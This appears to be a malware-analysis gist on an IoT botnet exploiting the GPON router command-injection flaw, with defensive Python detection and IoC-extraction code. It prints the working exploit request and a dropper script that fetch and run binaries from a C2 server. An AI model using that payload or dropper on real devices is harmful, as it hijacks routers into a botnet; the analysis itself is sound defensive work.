@Evilcry
Last active May 12, 2018 15:29
IoT botnet exploiting GPON Remote Code Execution (CVE-2018-10562) some notes

Hash List

:~/collected$ sha256sum *
efa4fe06e4949c0f7aedea61a79da92e379ea66b169cd1d99c47b9e93e814093  arm
1ff787d52bc9ec27d75b1a427c3e5dd16d6d5f082a79227c14edf8e908ab2  arm7
bab7e9f42df88902acb00fbdf3b4b5d8ffec2a1a7ad32eb5f2fb1dbf38f3167d  mips
a79964ce5cf4b92f996bbc24230e102b94ef05fb072c0afdeabc88d28695cace  mipsel

Arch List

:~/collected$ file *
arm:    ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm7:   ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
mips:   ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

IP List

:~/collected$ strings * | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
185.62.190.191
185.62.190.191
185.62.190.191
185.62.190.191

Interesting strings

Probe for vulnerability:

/GponForm/diag_Form?images/

Execute code (check https://www.exploit-db.com/exploits/44576/ for more information):

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
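The two indicators above (the `?images/` probe and shell metacharacters in the `dest_host` field) turned into a request-level detector, as an added example that is not part of the gist. It assumes request records of the form (method, target, body) as a WAF or reverse proxy would capture them, since plain access logs do not record POST bodies; the sample records are constructed.

```python
"""Flag GPON diag_Form abuse in captured HTTP requests.

Added example, not part of the gist. It turns the two indicators above (the
'?images/' auth-bypass probe and shell metacharacters in dest_host) into
checks over request records as a WAF or reverse proxy would see them.
"""
import re
from urllib.parse import unquote_plus, urlsplit

VULN_ENDPOINT = "/GponForm/diag_Form"
# C2 address observed in the samples (from the notes above).
KNOWN_C2 = {"185.62.190.191"}
# Shell metacharacters that never belong in a ping destination.
SHELL_META = re.compile(r"[`;|&]|\$\(")
# Stricter than the grep pattern used above: each octet is limited to 0-255.
IPV4 = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
DOWNLOADER = re.compile(r"\b(?:wget|curl|tftp)\b")


def parse_form(data):
    """Decode application/x-www-form-urlencoded text into (key, value) pairs.

    Done by hand instead of parse_qs so that '+' and '%xx' decoding is explicit
    and only '&' separates fields (older parse_qs versions also split on ';').
    """
    pairs = []
    for field in data.split("&"):
        if field:
            key, _, value = field.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyze_request(method, target, body=""):
    """Return sorted detection tags for one request; [] means nothing seen."""
    parts = urlsplit(target)
    if parts.path != VULN_ENDPOINT:
        return []
    tags = set()
    if parts.query.startswith("images/"):
        tags.add("gpon-auth-bypass-probe")
    form = body if method.upper() == "POST" else parts.query
    for key, value in parse_form(form):
        if key != "dest_host":
            continue
        if SHELL_META.search(value):
            tags.add("gpon-command-injection")
        if DOWNLOADER.search(value):
            tags.add("download-and-execute")
        if KNOWN_C2.intersection(IPV4.findall(value)):
            tags.add("known-c2-contact")
    return sorted(tags)


# Constructed sample traffic (method, target, body); not real captures.
SAMPLE_REQUESTS = [
    ("GET", "/index.html", ""),
    ("GET", "/GponForm/diag_Form?images/", ""),
    ("POST", "/GponForm/diag_Form?XWebPageName=diag", "dest_host=8.8.8.8&ipv=0"),
    ("POST", "/GponForm/diag_Form?images/",
     "XWebPageName=diag&diag_action=ping&wan_conlist=0"
     "&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0"),
]


def scan(requests=SAMPLE_REQUESTS):
    """Apply the detector to every record and keep only the hits."""
    hits = []
    for method, target, body in requests:
        tags = analyze_request(method, target, body)
        if tags:
            hits.append((method, target, tags))
    return hits


if __name__ == "__main__":
    for hit in scan():
        print(hit)
```

The form decoding is done by hand so that the `+` and `%xx` decoding the exploit relies on is visible, and so that a legitimate ping request (a bare hostname or address in `dest_host`) produces no tag while the probe and the injection each produce their own.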

The downloaded resource r is a /bin/sh shell script:

#!/bin/sh

n="arm mips mipsel arm7"
http_server="185.62.190.191"
#dirs="/tmp /var /dev/shm /dev"
dirs="/tmp"

for dir in $dirs
do
    >$dir/c && cd $dir
done

for i in $n
do
    cp $SHELL $i
    >$i
    wget http://$http_server/$i -O -> $i
    chmod 777 $i
    ./$i
done
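A static unroller for the dropper above, as an added example that is not tooling from the gist. It interprets only the subset of sh the script uses (plain assignments, `$var` expansion and `for ... in ... do ... done` loops), never executes anything, and rewrites the script into the concrete command lines it would run so that the download URLs, dropped files and executed paths can be listed for blocking or host hunting. The dropper text is embedded as the sample input; `$SHELL` is left unresolved because its value depends on the victim's environment.

```python
"""Unroll a Mirai-style dropper into the commands it would run and list IoCs.

Added example, not tooling from the gist: a tiny static interpreter for the
subset of sh the dropper above uses (plain assignments, `$var` expansion and
`for ... in ... do ... done` loops). It never executes anything; it only
rewrites the script into concrete lines and collects URLs and file paths.
"""
import posixpath
import re

# The dropper from the notes above, embedded as the sample input.
DROPPER = r'''#!/bin/sh
n="arm mips mipsel arm7"
http_server="185.62.190.191"
#dirs="/tmp /var /dev/shm /dev"
dirs="/tmp"

for dir in $dirs
do
    >$dir/c && cd $dir
done

for i in $n
do
    cp $SHELL $i
    >$i
    wget http://$http_server/$i -O -> $i
    chmod 777 $i
    ./$i
done
'''

ASSIGN = re.compile(r'^(\w+)=(?:"([^"]*)"|\'([^\']*)\'|(\S*))$')
FOR = re.compile(r'^for\s+(\w+)\s+in\s+(.*)$')
VAR = re.compile(r'\$(\w+)|\$\{(\w+)\}')
URL = re.compile(r'https?://[^\s;|&>"\']+')
REDIRECT = re.compile(r'>\s*(\S+)')


def expand(text, env):
    """Substitute $name / ${name}; unknown names (e.g. $SHELL) stay verbatim."""
    return VAR.sub(lambda m: env.get(m.group(1) or m.group(2), m.group(0)), text)


def unroll(script):
    """Return the concrete command lines the script would execute, in order."""
    lines = [ln.strip() for ln in script.splitlines()]
    lines = [ln for ln in lines if ln and not ln.startswith("#")]
    out = []
    _run(lines, 0, len(lines), {}, out)
    return out


def _run(lines, start, end, env, out):
    i = start
    while i < end:
        line = lines[i]
        m = ASSIGN.match(line)
        if m:
            value = next(g for g in m.groups()[1:] if g is not None)
            env[m.group(1)] = expand(value, env)
            i += 1
            continue
        m = FOR.match(line)
        if m and i + 1 < len(lines) and lines[i + 1] == "do":
            var, words = m.group(1), expand(m.group(2), env).split()
            body_start, depth, j = i + 2, 1, i + 2
            while depth:  # find the matching 'done', allowing nested loops
                if FOR.match(lines[j]):
                    depth += 1
                elif lines[j] == "done":
                    depth -= 1
                j += 1
            for word in words:
                env[var] = word
                _run(lines, body_start, j - 1, env, out)
            i = j
            continue
        out.append(expand(line, env))
        i += 1


def indicators(trace):
    """Collect download URLs, files written and files executed from a trace."""
    cwd, urls, written, executed = "/", [], [], []

    def add(seq, item):
        if item not in seq:
            seq.append(item)

    for line in trace:
        for url in URL.findall(line):
            add(urls, url)
        # Track the working directory across '&&' / ';' chains so relative
        # targets such as '>arm' resolve to their on-disk path.
        for cmd in re.split(r'\s*(?:&&|\|\||;)\s*', line):
            argv = cmd.split()
            if not argv:
                continue
            if argv[0] == "cd" and len(argv) > 1:
                cwd = posixpath.normpath(posixpath.join(cwd, argv[1]))
            elif argv[0].startswith("./"):
                add(executed, posixpath.normpath(posixpath.join(cwd, argv[0])))
            for target in REDIRECT.findall(cmd):
                add(written, posixpath.normpath(posixpath.join(cwd, target)))
    return {"urls": urls, "written": written, "executed": executed}


if __name__ == "__main__":
    trace = unroll(DROPPER)
    for line in trace:
        print(line)
    print(indicators(trace))
```

Running it on the embedded dropper yields four download URLs (one per architecture name in `n`), five written paths under /tmp (the `c` marker plus the four payload names) and the same four payload paths as executed; the same unroller applies to other droppers of this family that differ only in their variable values.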